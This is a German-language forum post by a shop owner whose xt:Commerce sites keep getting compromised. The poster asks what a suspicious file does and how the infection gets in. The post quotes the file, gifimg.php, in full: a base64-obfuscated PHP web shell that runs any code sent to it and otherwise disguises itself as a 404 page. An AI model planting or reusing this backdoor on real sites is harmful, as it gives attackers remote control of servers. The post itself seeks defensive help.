Hallo Jungs, also ich habe mein PC neu installiert und habe mit frischem WINDOWS und FILEZILLA alles nochmal hochgefahren, das Problem ist immer noch da, die seiten krachen eine nach andern ab... Das ist ein Hardcore Virus, Ich habe auch festgestellt das irgentwelche PHP dateien hochgefahren werden.. Es ist immer in einen IMAGE ORDER abgelegt, der name ist von diesem file: gifimg.php der inhalt:
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?> .
Was bedeutet das?? was macht dieser script?? Der hammer ist auch, ich habe 2 verschiedene Provider, bei dem einen gibt es eine Überschreib-sperre, bei dem andern nicht. Der Provider mit der Überschreib sperre ist bis jetzt nicht zusammengebrochen ( 2TAGE ), bei dem ohne hält die installation höchstens 2 tage... dann ist der virus drin. Ich nehme an das der virus durch den fckeditor reinkommt... was nur eine vermutung ist.. werde jetzt das letzt mal ohne fckeditor alles hochfahren und installieren, glaube nicht das es standhält...
Meine frage ist, kann es sein das der WURM in der DATABASE ist??
Ich habe auch schon mit meinen Leptop alles hochgefahren, wenn bei mir im PC ein virus gibt dann nicht auf mein Leptop...
Meine bitte ist XTC sicherer zu machen, ich kann euch die datenbank und den Provider geben, dann könnt ihr euch selber von diesem LECK überzeugen..
Freue mich über jede idee